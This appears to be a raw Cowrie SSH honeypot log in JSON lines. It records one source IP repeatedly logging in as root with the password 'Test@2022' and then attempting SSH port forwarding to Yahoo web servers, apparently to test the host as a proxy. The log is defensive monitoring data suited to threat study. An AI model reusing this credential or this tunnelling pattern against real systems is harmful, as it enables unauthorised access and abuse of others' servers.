{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.055593Z","src_ip":"213.209.150.239","session":"a01f4d838bda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2911,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2911","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.210945Z","session":"a01f4d838bda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.267674Z","src_ip":"213.209.150.239","session":"a01f4d838bda"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.325668Z","src_ip":"213.209.150.239","session":"a01f4d838bda"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40117,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee5b52f37bdb","protocol":"ssh","message":"New connection: 213.209.150.239:40117 (1.2.3.4:22) [session: ee5b52f37bdb]","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.381473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.382395Z","src_ip":"213.209.150.239","session":"ee5b52f37bdb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.438958Z","src_ip":"213.209.150.239","session":"ee5b52f37bdb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.721750Z","src_ip":"213.209.150.239","session":"ee5b52f37bdb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":19907,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:19907","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.779217Z","session":"ee5b52f37bdb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.836169Z","src_ip":"213.209.150.239","session":"ee5b52f37bdb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":12269,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12269","sensor":"my-vps","timestamp":"2025-08-26T01:06:08.995388Z","session":"ee5b52f37bdb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.052164Z","src_ip":"213.209.150.239","session":"ee5b52f37bdb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.109819Z","src_ip":"213.209.150.239","session":"ee5b52f37bdb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40188,"dst_ip":"1.2.3.4","dst_port":22,"session":"1881b5ad70cf","protocol":"ssh","message":"New connection: 213.209.150.239:40188 (1.2.3.4:22) [session: 1881b5ad70cf]","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.165413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.166387Z","src_ip":"213.209.150.239","session":"1881b5ad70cf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.222884Z","src_ip":"213.209.150.239","session":"1881b5ad70cf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.505320Z","src_ip":"213.209.150.239","session":"1881b5ad70cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":28144,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:28144","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.564546Z","session":"1881b5ad70cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.621382Z","src_ip":"213.209.150.239","session":"1881b5ad70cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":22337,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22337","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.775195Z","session":"1881b5ad70cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.832085Z","src_ip":"213.209.150.239","session":"1881b5ad70cf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.889440Z","src_ip":"213.209.150.239","session":"1881b5ad70cf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40245,"dst_ip":"1.2.3.4","dst_port":22,"session":"f713ffdce2c4","protocol":"ssh","message":"New connection: 213.209.150.239:40245 (1.2.3.4:22) [session: f713ffdce2c4]","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.945040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:09.945888Z","src_ip":"213.209.150.239","session":"f713ffdce2c4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.002487Z","src_ip":"213.209.150.239","session":"f713ffdce2c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.284749Z","src_ip":"213.209.150.239","session":"f713ffdce2c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8305,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8305","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.342939Z","session":"f713ffdce2c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.399606Z","src_ip":"213.209.150.239","session":"f713ffdce2c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":30640,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30640","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.555046Z","session":"f713ffdce2c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.611868Z","src_ip":"213.209.150.239","session":"f713ffdce2c4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.669699Z","src_ip":"213.209.150.239","session":"f713ffdce2c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40307,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc4d102894bf","protocol":"ssh","message":"New connection: 213.209.150.239:40307 (1.2.3.4:22) [session: dc4d102894bf]","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.725407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.726447Z","src_ip":"213.209.150.239","session":"dc4d102894bf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:10.783417Z","src_ip":"213.209.150.239","session":"dc4d102894bf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.065881Z","src_ip":"213.209.150.239","session":"dc4d102894bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":6752,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:6752","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.123384Z","session":"dc4d102894bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.180270Z","src_ip":"213.209.150.239","session":"dc4d102894bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23614,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23614","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.334991Z","session":"dc4d102894bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.391730Z","src_ip":"213.209.150.239","session":"dc4d102894bf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.449646Z","src_ip":"213.209.150.239","session":"dc4d102894bf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40365,"dst_ip":"1.2.3.4","dst_port":22,"session":"434c2e19eae2","protocol":"ssh","message":"New connection: 213.209.150.239:40365 (1.2.3.4:22) [session: 434c2e19eae2]","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.495638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.496399Z","src_ip":"213.209.150.239","session":"434c2e19eae2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.543421Z","src_ip":"213.209.150.239","session":"434c2e19eae2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.778143Z","src_ip":"213.209.150.239","session":"434c2e19eae2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":21748,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21748","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.826190Z","session":"434c2e19eae2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:11.873436Z","src_ip":"213.209.150.239","session":"434c2e19eae2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20237,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20237","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.009443Z","session":"434c2e19eae2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.056406Z","src_ip":"213.209.150.239","session":"434c2e19eae2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.104094Z","src_ip":"213.209.150.239","session":"434c2e19eae2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40408,"dst_ip":"1.2.3.4","dst_port":22,"session":"a39899882b66","protocol":"ssh","message":"New connection: 213.209.150.239:40408 (1.2.3.4:22) [session: a39899882b66]","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.159941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.160866Z","src_ip":"213.209.150.239","session":"a39899882b66"}
